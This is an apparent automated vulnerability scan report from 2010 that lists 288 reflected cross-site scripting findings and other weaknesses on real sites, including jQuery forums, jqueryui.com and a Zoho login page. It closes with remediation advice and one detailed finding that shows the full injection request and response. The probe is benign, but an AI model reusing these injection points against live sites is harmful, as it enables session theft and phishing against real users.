Report generated by XSS.CX at Mon Nov 15 20:46:53 CST 2010.


1. Cross-site scripting (reflected)

1.1. https://accounts.zoho.com/login [serviceurl parameter]

1.2. https://accounts.zoho.com/login [serviceurl parameter]

1.3. http://forum.jquery.com/ [name of an arbitrarily supplied request parameter]

1.4. http://forum.jquery.com/about-the-jquery-forum [name of an arbitrarily supplied request parameter]

1.5. http://forum.jquery.com/developing-jquery-mobile [name of an arbitrarily supplied request parameter]

1.6. http://forum.jquery.com/developing-jquery-plugins [name of an arbitrarily supplied request parameter]

1.7. http://forum.jquery.com/jquery-conferences [name of an arbitrarily supplied request parameter]

1.8. http://forum.jquery.com/jquery-mobile [name of an arbitrarily supplied request parameter]

1.9. http://forum.jquery.com/qunit-and-testing [name of an arbitrarily supplied request parameter]

1.10. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [name of an arbitrarily supplied request parameter]

1.11. http://forum.jquery.com/topic/looking-for-help-on-panel-development [name of an arbitrarily supplied request parameter]

1.12. http://forum.jquery.com/user/andrew_powell [name of an arbitrarily supplied request parameter]

1.13. http://forum.jquery.com/user/charlietfl [name of an arbitrarily supplied request parameter]

1.14. http://forum.jquery.com/user/christophe [name of an arbitrarily supplied request parameter]

1.15. http://forum.jquery.com/user/jeresig [name of an arbitrarily supplied request parameter]

1.16. http://forum.jquery.com/user/kbwood.au [name of an arbitrarily supplied request parameter]

1.17. http://forum.jquery.com/user/scottjehl [name of an arbitrarily supplied request parameter]

1.18. http://forum.jquery.com/user/wycats [name of an arbitrarily supplied request parameter]

1.19. http://jqueryui.com/demos/accordion [REST URL parameter 2]

1.20. http://jqueryui.com/demos/addClass [REST URL parameter 2]

1.21. http://jqueryui.com/demos/animate [REST URL parameter 2]

1.22. http://jqueryui.com/demos/autocomplete [REST URL parameter 2]

1.23. http://jqueryui.com/demos/button [REST URL parameter 2]

1.24. http://jqueryui.com/demos/datepicker [REST URL parameter 2]

1.25. http://jqueryui.com/demos/dialog [REST URL parameter 2]

1.26. http://jqueryui.com/demos/draggable [REST URL parameter 2]

1.27. http://jqueryui.com/demos/droppable [REST URL parameter 2]

1.28. http://jqueryui.com/demos/effect [REST URL parameter 2]

1.29. http://jqueryui.com/demos/hide [REST URL parameter 2]

1.30. http://jqueryui.com/demos/position [REST URL parameter 2]

1.31. http://jqueryui.com/demos/progressbar [REST URL parameter 2]

1.32. http://jqueryui.com/demos/removeClass [REST URL parameter 2]

1.33. http://jqueryui.com/demos/resizable [REST URL parameter 2]

1.34. http://jqueryui.com/demos/selectable [REST URL parameter 2]

1.35. http://jqueryui.com/demos/show [REST URL parameter 2]

1.36. http://jqueryui.com/demos/slider [REST URL parameter 2]

1.37. http://jqueryui.com/demos/sortable [REST URL parameter 2]

1.38. http://jqueryui.com/demos/switchClass [REST URL parameter 2]

1.39. http://jqueryui.com/demos/tabs [REST URL parameter 2]

1.40. http://jqueryui.com/demos/toggle [REST URL parameter 2]

1.41. http://jqueryui.com/demos/toggleClass [REST URL parameter 2]

1.42. http://jqueryui.com/docs/Changelog [REST URL parameter 2]

1.43. http://jqueryui.com/docs/Changelog [REST URL parameter 2]

1.44. http://jqueryui.com/docs/Developer_Guide [REST URL parameter 2]

1.45. http://jqueryui.com/docs/Developer_Guide [REST URL parameter 2]

1.46. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 2]

1.47. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 2]

1.48. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 3]

1.49. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 3]

1.50. http://jqueryui.com/docs/Getting_Started [REST URL parameter 2]

1.51. http://jqueryui.com/docs/Getting_Started [REST URL parameter 2]

1.52. http://jqueryui.com/docs/Git [REST URL parameter 2]

1.53. http://jqueryui.com/docs/Git [REST URL parameter 2]

1.54. http://jqueryui.com/docs/Theming [REST URL parameter 2]

1.55. http://jqueryui.com/docs/Theming [REST URL parameter 2]

1.56. http://jqueryui.com/docs/Theming/API [REST URL parameter 2]

1.57. http://jqueryui.com/docs/Theming/API [REST URL parameter 2]

1.58. http://jqueryui.com/docs/Theming/API [REST URL parameter 3]

1.59. http://jqueryui.com/docs/Theming/API [REST URL parameter 3]

1.60. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 2]

1.61. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 2]

1.62. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 3]

1.63. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 3]

1.64. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 2]

1.65. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 2]

1.66. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 3]

1.67. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 3]

1.68. http://jqueryui.com/docs/Upgrade_Guide [REST URL parameter 2]

1.69. http://jqueryui.com/docs/Upgrade_Guide [REST URL parameter 2]

1.70. http://jqueryui.com/download [themeParams parameter]

1.71. http://jqueryui.com/themeroller/ [bgColorActive parameter]

1.72. http://jqueryui.com/themeroller/ [bgColorContent parameter]

1.73. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

1.74. http://jqueryui.com/themeroller/ [bgColorError parameter]

1.75. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

1.76. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

1.77. http://jqueryui.com/themeroller/ [bgColorHover parameter]

1.78. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

1.79. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

1.80. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

1.81. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

1.82. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

1.83. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

1.84. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

1.85. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

1.86. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

1.87. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

1.88. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

1.89. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

1.90. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

1.91. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

1.92. http://jqueryui.com/themeroller/ [bgTextureError parameter]

1.93. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

1.94. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

1.95. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

1.96. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

1.97. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

1.98. http://jqueryui.com/themeroller/ [borderColorActive parameter]

1.99. http://jqueryui.com/themeroller/ [borderColorContent parameter]

1.100. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

1.101. http://jqueryui.com/themeroller/ [borderColorError parameter]

1.102. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

1.103. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

1.104. http://jqueryui.com/themeroller/ [borderColorHover parameter]

1.105. http://jqueryui.com/themeroller/ [cornerRadius parameter]

1.106. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

1.107. http://jqueryui.com/themeroller/ [fcActive parameter]

1.108. http://jqueryui.com/themeroller/ [fcContent parameter]

1.109. http://jqueryui.com/themeroller/ [fcDefault parameter]

1.110. http://jqueryui.com/themeroller/ [fcError parameter]

1.111. http://jqueryui.com/themeroller/ [fcHeader parameter]

1.112. http://jqueryui.com/themeroller/ [fcHighlight parameter]

1.113. http://jqueryui.com/themeroller/ [fcHover parameter]

1.114. http://jqueryui.com/themeroller/ [ffDefault parameter]

1.115. http://jqueryui.com/themeroller/ [fsDefault parameter]

1.116. http://jqueryui.com/themeroller/ [fwDefault parameter]

1.117. http://jqueryui.com/themeroller/ [iconColorActive parameter]

1.118. http://jqueryui.com/themeroller/ [iconColorContent parameter]

1.119. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

1.120. http://jqueryui.com/themeroller/ [iconColorError parameter]

1.121. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

1.122. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

1.123. http://jqueryui.com/themeroller/ [iconColorHover parameter]

1.124. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

1.125. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

1.126. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

1.127. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

1.128. http://jqueryui.com/themeroller/ [opacityShadow parameter]

1.129. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

1.130. http://jqueryui.com/themeroller/_rollyourown.php [bgColorActive parameter]

1.131. http://jqueryui.com/themeroller/_rollyourown.php [bgColorContent parameter]

1.132. http://jqueryui.com/themeroller/_rollyourown.php [bgColorDefault parameter]

1.133. http://jqueryui.com/themeroller/_rollyourown.php [bgColorError parameter]

1.134. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHeader parameter]

1.135. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHighlight parameter]

1.136. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHover parameter]

1.137. http://jqueryui.com/themeroller/_rollyourown.php [bgColorOverlay parameter]

1.138. http://jqueryui.com/themeroller/_rollyourown.php [bgColorShadow parameter]

1.139. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityActive parameter]

1.140. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityContent parameter]

1.141. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityDefault parameter]

1.142. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityError parameter]

1.143. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHeader parameter]

1.144. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHighlight parameter]

1.145. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHover parameter]

1.146. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityOverlay parameter]

1.147. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityShadow parameter]

1.148. http://jqueryui.com/themeroller/_rollyourown.php [borderColorActive parameter]

1.149. http://jqueryui.com/themeroller/_rollyourown.php [borderColorContent parameter]

1.150. http://jqueryui.com/themeroller/_rollyourown.php [borderColorDefault parameter]

1.151. http://jqueryui.com/themeroller/_rollyourown.php [borderColorError parameter]

1.152. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHeader parameter]

1.153. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHighlight parameter]

1.154. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHover parameter]

1.155. http://jqueryui.com/themeroller/_rollyourown.php [cornerRadius parameter]

1.156. http://jqueryui.com/themeroller/_rollyourown.php [cornerRadiusShadow parameter]

1.157. http://jqueryui.com/themeroller/_rollyourown.php [fcActive parameter]

1.158. http://jqueryui.com/themeroller/_rollyourown.php [fcContent parameter]

1.159. http://jqueryui.com/themeroller/_rollyourown.php [fcDefault parameter]

1.160. http://jqueryui.com/themeroller/_rollyourown.php [fcError parameter]

1.161. http://jqueryui.com/themeroller/_rollyourown.php [fcHeader parameter]

1.162. http://jqueryui.com/themeroller/_rollyourown.php [fcHighlight parameter]

1.163. http://jqueryui.com/themeroller/_rollyourown.php [fcHover parameter]

1.164. http://jqueryui.com/themeroller/_rollyourown.php [ffDefault parameter]

1.165. http://jqueryui.com/themeroller/_rollyourown.php [fsDefault parameter]

1.166. http://jqueryui.com/themeroller/_rollyourown.php [iconColorActive parameter]

1.167. http://jqueryui.com/themeroller/_rollyourown.php [iconColorContent parameter]

1.168. http://jqueryui.com/themeroller/_rollyourown.php [iconColorDefault parameter]

1.169. http://jqueryui.com/themeroller/_rollyourown.php [iconColorError parameter]

1.170. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHeader parameter]

1.171. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHighlight parameter]

1.172. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHover parameter]

1.173. http://jqueryui.com/themeroller/_rollyourown.php [offsetLeftShadow parameter]

1.174. http://jqueryui.com/themeroller/_rollyourown.php [offsetTopShadow parameter]

1.175. http://jqueryui.com/themeroller/_rollyourown.php [opacityOverlay parameter]

1.176. http://jqueryui.com/themeroller/_rollyourown.php [opacityShadow parameter]

1.177. http://jqueryui.com/themeroller/_rollyourown.php [thicknessShadow parameter]

1.178. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorActive parameter]

1.179. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorContent parameter]

1.180. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorDefault parameter]

1.181. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorError parameter]

1.182. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHeader parameter]

1.183. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHighlight parameter]

1.184. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHover parameter]

1.185. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorOverlay parameter]

1.186. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorShadow parameter]

1.187. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityActive parameter]

1.188. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityContent parameter]

1.189. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityDefault parameter]

1.190. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityError parameter]

1.191. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHeader parameter]

1.192. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHighlight parameter]

1.193. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHover parameter]

1.194. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityOverlay parameter]

1.195. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityShadow parameter]

1.196. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureActive parameter]

1.197. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureContent parameter]

1.198. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureDefault parameter]

1.199. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureError parameter]

1.200. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHeader parameter]

1.201. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHighlight parameter]

1.202. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHover parameter]

1.203. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureOverlay parameter]

1.204. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureShadow parameter]

1.205. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorActive parameter]

1.206. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorContent parameter]

1.207. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorDefault parameter]

1.208. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorError parameter]

1.209. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHeader parameter]

1.210. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHighlight parameter]

1.211. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHover parameter]

1.212. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadius parameter]

1.213. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadiusShadow parameter]

1.214. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadiusUnit parameter]

1.215. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

1.216. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcActive parameter]

1.217. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcContent parameter]

1.218. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcDefault parameter]

1.219. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcError parameter]

1.220. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHeader parameter]

1.221. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHighlight parameter]

1.222. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHover parameter]

1.223. http://jqueryui.com/themeroller/css/parseTheme.css.php [ffDefault parameter]

1.224. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefault parameter]

1.225. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefaultUnit parameter]

1.226. http://jqueryui.com/themeroller/css/parseTheme.css.php [fwDefault parameter]

1.227. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorActive parameter]

1.228. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorContent parameter]

1.229. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorDefault parameter]

1.230. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorError parameter]

1.231. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHeader parameter]

1.232. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHighlight parameter]

1.233. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHover parameter]

1.234. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

1.235. http://jqueryui.com/themeroller/css/parseTheme.css.php [offsetLeftShadow parameter]

1.236. http://jqueryui.com/themeroller/css/parseTheme.css.php [offsetTopShadow parameter]

1.237. http://jqueryui.com/themeroller/css/parseTheme.css.php [opacityOverlay parameter]

1.238. http://jqueryui.com/themeroller/css/parseTheme.css.php [opacityShadow parameter]

1.239. http://jqueryui.com/themeroller/css/parseTheme.css.php [thicknessShadow parameter]

1.240. http://jqueryui.com/themeroller/css/parseTheme.css.php [tr parameter]

1.241. http://jqueryui.com/themeroller/css/parseTheme.css.php [tr&ffDefault parameter]

1.242. http://netwinsite.com/cgi-bin/keycgi.exe [product parameter]

1.243. http://netwinsite.com/cgi-bin/keycgi.exe [product parameter]

1.244. https://netwinsite.com/cgi-bin/keycgi.exe [product parameter]

1.245. http://news.netwinsite.com:8119/webnews [group parameter]

1.246. http://news.netwinsite.com:8119/webnews [group parameter]

1.247. http://news.netwinsite.com:8119/webnews [group parameter]

1.248. http://st247.qanalyze.com/qanalyze_js.php [idSite parameter]

1.249. http://st247.qanalyze.com/qanalyze_js.php [refElement parameter]

1.250. http://translate-pirate.com/cgi-bin/xlate.cgi [page parameter]

1.251. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

1.252. http://www.surgemail.com/cgi-bin/keycgi.exe [product parameter]

1.253. http://www.surgemail.com/cgi-bin/keycgi.exe [product parameter]

1.254. https://accounts.zoho.com/login [iamcsr cookie]

1.255. http://forum.jquery.com/ [zdccn cookie]

1.256. http://forum.jquery.com/ [zdccn cookie]

1.257. http://forum.jquery.com/about-the-jquery-forum [zdccn cookie]

1.258. http://forum.jquery.com/about-the-jquery-forum [zdccn cookie]

1.259. http://forum.jquery.com/developing-jquery-mobile [zdccn cookie]

1.260. http://forum.jquery.com/developing-jquery-mobile [zdccn cookie]

1.261. http://forum.jquery.com/developing-jquery-plugins [zdccn cookie]

1.262. http://forum.jquery.com/developing-jquery-plugins [zdccn cookie]

1.263. http://forum.jquery.com/jquery-conferences [zdccn cookie]

1.264. http://forum.jquery.com/jquery-conferences [zdccn cookie]

1.265. http://forum.jquery.com/jquery-mobile [zdccn cookie]

1.266. http://forum.jquery.com/jquery-mobile [zdccn cookie]

1.267. http://forum.jquery.com/portalLogin.do [zdccn cookie]

1.268. http://forum.jquery.com/qunit-and-testing [zdccn cookie]

1.269. http://forum.jquery.com/qunit-and-testing [zdccn cookie]

1.270. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [zdccn cookie]

1.271. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [zdccn cookie]

1.272. http://forum.jquery.com/topic/looking-for-help-on-panel-development [zdccn cookie]

1.273. http://forum.jquery.com/topic/looking-for-help-on-panel-development [zdccn cookie]

1.274. http://forum.jquery.com/user/andrew_powell [zdccn cookie]

1.275. http://forum.jquery.com/user/andrew_powell [zdccn cookie]

1.276. http://forum.jquery.com/user/charlietfl [zdccn cookie]

1.277. http://forum.jquery.com/user/charlietfl [zdccn cookie]

1.278. http://forum.jquery.com/user/christophe [zdccn cookie]

1.279. http://forum.jquery.com/user/christophe [zdccn cookie]

1.280. http://forum.jquery.com/user/jeresig [zdccn cookie]

1.281. http://forum.jquery.com/user/jeresig [zdccn cookie]

1.282. http://forum.jquery.com/user/kbwood.au [zdccn cookie]

1.283. http://forum.jquery.com/user/kbwood.au [zdccn cookie]

1.284. http://forum.jquery.com/user/scottjehl [zdccn cookie]

1.285. http://forum.jquery.com/user/scottjehl [zdccn cookie]

1.286. http://forum.jquery.com/user/wycats [zdccn cookie]

1.287. http://forum.jquery.com/user/wycats [zdccn cookie]

1.288. http://forum.jquery.com/using-jquery [zdccn cookie]

2. Cookie without HttpOnly flag set

2.1. http://bugs.jquery.com/newticket

2.2. http://forum.jquery.com/about-the-jquery-forum

2.3. http://forum.jquery.com/about-the-jquery-forum/feed

2.4. http://forum.jquery.com/developing-jquery-core/feed

2.5. http://forum.jquery.com/developing-jquery-mobile

2.6. http://forum.jquery.com/developing-jquery-mobile/feed

2.7. http://forum.jquery.com/developing-jquery-plugins

2.8. http://forum.jquery.com/developing-jquery-plugins/feed

2.9. http://forum.jquery.com/developing-jquery-ui/feed

2.10. http://forum.jquery.com/jquery-conferences

2.11. http://forum.jquery.com/jquery-conferences/feed

2.12. http://forum.jquery.com/jquery-mobile

2.13. http://forum.jquery.com/jquery-mobile/feed

2.14. http://forum.jquery.com/jsp/i18nConstants.jsp

2.15. http://forum.jquery.com/qunit-and-testing

2.16. http://forum.jquery.com/qunit-and-testing/feed

2.17. http://forum.jquery.com/sendFeedback.do

2.18. http://forum.jquery.com/subscribeRegister.do

2.19. http://forum.jquery.com/topic/how-can-i-help-9-5-2010

2.20. http://forum.jquery.com/topic/looking-for-help-on-panel-development

2.21. http://forum.jquery.com/uploadImage.do

2.22. http://forum.jquery.com/user/andrew_powell

2.23. http://forum.jquery.com/user/charlietfl

2.24. http://forum.jquery.com/user/christophe

2.25. http://forum.jquery.com/user/jeresig

2.26. http://forum.jquery.com/user/kbwood.au

2.27. http://forum.jquery.com/user/scottjehl

2.28. http://forum.jquery.com/user/wycats

2.29. http://forum.jquery.com/using-jquery-plugins/feed

2.30. http://forum.jquery.com/using-jquery-ui/feed

2.31. http://forum.jquery.com/using-jquery/feed

2.32. http://meetups.jquery.com/main/badge/showPlayerConfig

2.33. http://plugins.jquery.com/

2.34. http://b.scorecardresearch.com/b

3. Password field with autocomplete enabled

4. Cookie scoped to parent domain

5. Cross-domain Referer leakage

5.1. http://forum.jquery.com/subscribeRegister.do

5.2. http://go.microsoft.com/fwlink/

6. Cross-domain script include

6.1. http://forum.jquery.com/about-the-jquery-forum

6.2. http://forum.jquery.com/developing-jquery-mobile

6.3. http://forum.jquery.com/developing-jquery-plugins

6.4. http://forum.jquery.com/jquery-conferences

6.5. http://forum.jquery.com/jquery-mobile

6.6. http://forum.jquery.com/qunit-and-testing

6.7. http://forum.jquery.com/subscribeRegister.do

6.8. http://forum.jquery.com/topic/how-can-i-help-9-5-2010

6.9. http://forum.jquery.com/topic/looking-for-help-on-panel-development

6.10. http://forum.jquery.com/user/andrew_powell

6.11. http://forum.jquery.com/user/charlietfl

6.12. http://forum.jquery.com/user/christophe

6.13. http://forum.jquery.com/user/escape164

6.14. http://forum.jquery.com/user/jeresig

6.15. http://forum.jquery.com/user/joern.zaefferer

6.16. http://forum.jquery.com/user/kbwood.au

6.17. http://forum.jquery.com/user/malsup

6.18. http://forum.jquery.com/user/scottjehl

6.19. http://forum.jquery.com/user/wycats

6.20. http://osvdb.org/

7. File upload functionality

7.1. http://forum.jquery.com/about-the-jquery-forum

7.2. http://forum.jquery.com/developing-jquery-plugins

7.3. http://forum.jquery.com/jquery-conferences

7.4. http://forum.jquery.com/jquery-mobile

7.5. http://forum.jquery.com/qunit-and-testing

7.6. http://forum.jquery.com/topic/how-can-i-help-9-5-2010

7.7. http://forum.jquery.com/topic/looking-for-help-on-panel-development

7.8. http://forum.jquery.com/user/andrew_powell

7.9. http://forum.jquery.com/user/charlietfl

7.10. http://forum.jquery.com/user/christophe

7.11. http://forum.jquery.com/user/jeresig

7.12. http://forum.jquery.com/user/kbwood.au

7.13. http://forum.jquery.com/user/malsup

7.14. http://forum.jquery.com/user/scottjehl

7.15. http://forum.jquery.com/user/wycats

8. Email addresses disclosed

8.1. http://forum.jquery.com/developing-jquery-mobile/feed

8.2. http://forum.jquery.com/jquery-conferences/feed

8.3. http://forum.jquery.com/user/jeresig

8.4. http://forum.jquery.com/user/malsup

8.5. http://forum.jquery.com/user/wycats

8.6. http://plugins.jquery.com/sites/all/themes/jquery/js/jquery-plugins.js

8.7. http://static.jquery.com/files/rocker/scripts/custom.js

8.8. http://static.jquery.com/jobs.js

8.9. http://static.jquery.com/ui/themeroller/scripts/app.js

9. Cacheable HTTPS response

10. Multiple content types specified

11. HTML does not specify charset

12. Content type incorrectly stated



1. Cross-site scripting (reflected)
There are 288 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

- Input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (for example, a year of birth should consist of exactly four numerals, and an email address should match a well-defined regular expression). Input that fails validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses, so that HTML metacharacters such as < > " ' and = are replaced with their corresponding HTML entities.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://accounts.zoho.com/login [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Issue detail

The value of the serviceurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a37d'><a%20b%3dc>17750179308 was submitted in the serviceurl parameter. This input was echoed as 4a37d'><a b=c>17750179308 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /login?service_language=default&hide_signup=true&servicename=ZohoDiscussions&serviceurl=http://forum.jquery.com4a37d'><a%20b%3dc>17750179308 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://forum.jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: accounts.zoho.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=e47ba0bd-72d2-418c-a842-a99577ce1f9b; Path=/
Set-Cookie: JSESSIONID=0CA38E6825823BE532CAB2F13BE31D61; Path=/; Secure
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:22:44 GMT
Server: ZWS
Content-Length: 21412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<input name="serviceurl" value='http://forum.jquery.com4a37d'><a b=c>17750179308' type="hidden">
...[SNIP]...

1.2. https://accounts.zoho.com/login [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
